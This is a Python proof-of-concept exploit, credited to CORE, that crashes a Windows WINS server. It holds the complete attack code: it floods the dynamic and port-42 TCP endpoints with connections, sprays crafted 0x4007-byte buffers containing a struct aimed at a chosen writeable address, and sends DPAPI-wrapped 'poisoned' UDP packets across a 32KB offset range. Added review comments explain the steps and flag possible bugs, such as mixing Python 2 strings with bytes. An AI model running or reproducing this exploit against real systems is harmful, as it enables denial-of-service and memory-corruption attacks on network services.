# Proof of concept (credited to CORE) for crashing a Win32 WINS host; the original poster notes it could be made to work in several other ways.
  2. import sys
  3. import socket
  4. import struct
  5. import time
  6. import os
  7.  
  8. from ctypes import *
  9. from ctypes.wintypes import DWORD
  10.  
# Win32 entry points used by the DPAPI helpers below. This is Windows-only:
# `windll` and `cdll.msvcrt` exist only in Windows builds of ctypes.
_kernel32 = windll.kernel32
_crypt32 = windll.crypt32

LocalFree = _kernel32.LocalFree                   # releases buffers the API allocates
CryptProtectData = _crypt32.CryptProtectData      # DPAPI encrypt
CryptUnprotectData = _crypt32.CryptUnprotectData  # DPAPI decrypt; not referenced elsewhere in this file
memcpy = cdll.msvcrt.memcpy                       # CRT memcpy, used to copy out of an output blob

# dwFlags value for CryptProtectData. Per the DPAPI documentation this binds
# the blob to the machine rather than to the calling user, so any account on
# the same host can decrypt it -- fine for a local PoC, not for storing secrets.
CRYPTPROTECT_LOCAL_MACHINE = 0x04
  17.  
class DATA_BLOB(Structure):
    """ctypes mirror of the Win32 ``DATA_BLOB`` (``CRYPT_INTEGER_BLOB``) struct.

    ``cbData`` is the byte length and ``pbData`` points at the bytes. The same
    layout serves as the plaintext input and the ciphertext output of
    CryptProtectData; for the output the buffer is allocated by the OS and
    must be handed back with LocalFree (see get_data).
    """

    _fields_ = [
        ("cbData", DWORD),
        ("pbData", POINTER(c_char)),
    ]
  20.  
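def get_data(blob):
    """Copy the bytes out of an OS-allocated DATA_BLOB and then free it.

    Reads ``blob.cbData`` bytes from ``blob.pbData`` into a Python byte
    string and releases the buffer with LocalFree. ctypes.string_at does the
    copy, so the CRT memcpy import and the intermediate scratch buffer of the
    original are no longer needed. Only use this on blobs whose ``pbData``
    the API allocated (the output of CryptProtectData); freeing caller-owned
    memory this way would be a bug.
    """
    length = int(blob.cbData)
    # Copy first, free second: the pointer is dangling after LocalFree.
    raw = string_at(blob.pbData, length)
    LocalFree(blob.pbData)
    return raw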
  28.  
def Win32CryptProtectData(plain):
    """Encrypt ``plain`` with DPAPI (CryptProtectData) under the machine key.

    The description string ``"win32crypto.py"`` is embedded in the blob; no
    optional entropy and no prompt struct are supplied. Returns the opaque
    DPAPI blob as a byte string, or ``None`` if the API call reports failure.
    Because CRYPTPROTECT_LOCAL_MACHINE is passed, any account on this host
    can decrypt the result.
    """
    src = create_string_buffer(plain, len(plain))  # exact size, no trailing NUL
    in_blob = DATA_BLOB(len(plain), src)
    out_blob = DATA_BLOB()
    ok = CryptProtectData(
        byref(in_blob),
        u"win32crypto.py",            # szDataDescr
        None,                         # pOptionalEntropy
        None,                         # pvReserved
        None,                         # pPromptStruct
        CRYPTPROTECT_LOCAL_MACHINE,
        byref(out_blob),
    )
    if not ok:
        return None
    # out_blob.pbData was allocated by the API; get_data copies and frees it.
    return get_data(out_blob)
  37.  
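def send_packet(sock, ip, port, message):
    """Send ``message`` as one datagram to ``(ip, port)`` on ``sock``.

    ``sock`` must be a datagram (UDP) socket; the payload goes out as-is.
    The original prepended an empty ``str`` to the message, which is a no-op
    under Python 2 and a TypeError for ``bytes`` under Python 3, so the
    message is now handed straight to ``sendto``. Raises whatever ``sendto``
    raises (e.g. TypeError if ``message`` is None because encryption failed).
    """
    sock.sendto(message, (ip, port))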
  42.  
# Check args: exactly three positional parameters are required.
if len(sys.argv) != 4:
    print("\nUsage: python wins_poc.py <wins_tcp_dynamic_port(42)> <wins_udp_dynamic_port(41)> <writeable_address(hex)Try: 0x10c00>")
    print("\nNote: On Win2K3, the UDP dynamic port is the same number of the TCP port less one (42-1)")
    # Kept as in the original: a usage error still exits with status 0.
    sys.exit(0)
  48.  
# Parse the three positional arguments (their count was validated above).
_, tcp_arg, udp_arg, addr_arg = sys.argv[:4]
tcp_dynamic_port = int(tcp_arg)        # WINS TCP port (usage text suggests 42)
udp_dynamic_port = int(udp_arg)        # WINS UDP port (usage text: TCP port minus one on Win2K3)
writeable_address = int(addr_arg, 16)  # hex; base-16 int() accepts an "0x" prefix

# Target IP. The PoC only ever talks to the local host, i.e. it is meant to be
# run on the WINS server itself (presumably also why machine-scoped DPAPI
# blobs are accepted by the target -- not verifiable from this file).
target_ip = "127.0.0.1"
  56.  
# Open as many TCP connections to the dynamic WINS port as the server will
# take (at most 1000); each one later carries a copy of the spray payload.
# The loop stops at the first failure, so rpc_connections holds only sockets
# that connected. The socket of the failed attempt is not closed (as in the
# original); it is released when the interpreter exits.
rpc_connections = []
for _ in range(1000):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_ip, tcp_dynamic_port))
    except Exception:
        break
    rpc_connections.append(sock)
  66.  
# Struct that is validated by WINS.
# Layout of the 0x3c-byte header that leads each spray buffer. The offsets in
# the comments are byte offsets into magic_struct; every pack("I") is a
# native-endian 4-byte value (the target is the local host, so native order
# is the target's order).
magic_struct  = ""
magic_struct += "a" * 0x0c                                # 0x00..0x0b: filler
magic_struct += struct.pack("I", writeable_address-0x14)  # 0x0c: user-supplied address minus 0x14
magic_struct += struct.pack("I", 0)                       # 0x10
magic_struct += struct.pack("I", 4)                       # 0x14
magic_struct += "b" * (0x20-len(magic_struct))            # pad to 0x20
magic_struct += struct.pack("I", 1)                       # 0x20
magic_struct += "c" * (0x2c-len(magic_struct))            # pad to 0x2c
# 0x2c: literal 0x10c00. NOTE(review): this is not tied to writeable_address
# even though the usage text suggests 0x10c00 for that argument -- confirm
# whether the argument was meant to be used here too.
magic_struct += struct.pack("I", 0x10c00)
magic_struct += "d" * (0x38-len(magic_struct))            # pad to 0x38
magic_struct += struct.pack("I", 0)                       # 0x38; total length 0x3c
# One spray buffer: the header, 'B' filler up to 0x4000 bytes, then a 7-byte
# tail, so 0x4007 bytes are sent down each connection.
data  = ""
data += magic_struct
data += "B" * (0x4000-len(data))
data += "filling"
  83.  
# Push the spray payload down every connection opened above. Failures are
# deliberately ignored (best effort): a connection the server has already
# dropped simply does not get its copy. Note this is send(), not sendall(),
# so a short write is also silently accepted.
for conn in rpc_connections:
    try:
        conn.send(data)
    except Exception:
        pass
  90.  
# Get to the limit of WINS connections: open 300 further TCP connections,
# this time to the fixed port 42 rather than the dynamic port. Unlike the
# loop above there is no try/except here, so a refused connection aborts
# the script with the exception.
print("[!] Connecting ..")
ps = []
for _ in range(300):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_ip, 42))
    ps.append(sock)
  98.  
# Go through an area 32Kb: one UDP datagram per 4-byte step over
# 0x0000..0x7ffc. Each plaintext is 0x18 bytes -- a zero dword, twelve 'A's,
# a zero dword, then 0x05000000 plus the current offset (native-endian) --
# and is DPAPI-wrapped with Win32CryptProtectData before being sent. A fresh
# UDP socket is used for every packet and closed straight after.
# This loop reuses the module-level name `data`, clobbering the spray buffer
# built above (already sent by this point).
for offset in range(0, 0x8000, 4):
    # Data to send
    data  = ""
    data += struct.pack("I", 0)
    data += "A" * 0x0c
    data += struct.pack("I", 0)
    data += struct.pack("I", 0x05000000+offset)
    # Encrypt. NOTE(review): Win32CryptProtectData returns None on failure,
    # and send_packet then raises TypeError instead of reporting a clean error.
    data2 = Win32CryptProtectData(data)
    # Send the poisoned packet
    p = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    send_packet(p, target_ip, udp_dynamic_port, data2)
    p.close ()
  113.  
# Tear down every socket we opened: the port-42 connections first, then the
# spray connections (same order as the original). Nothing is reported back;
# the effect on the WINS service has to be observed on the target itself.
print("[*] Now Closing TCP connections ...")
for sock in ps + rpc_connections:
    sock.close()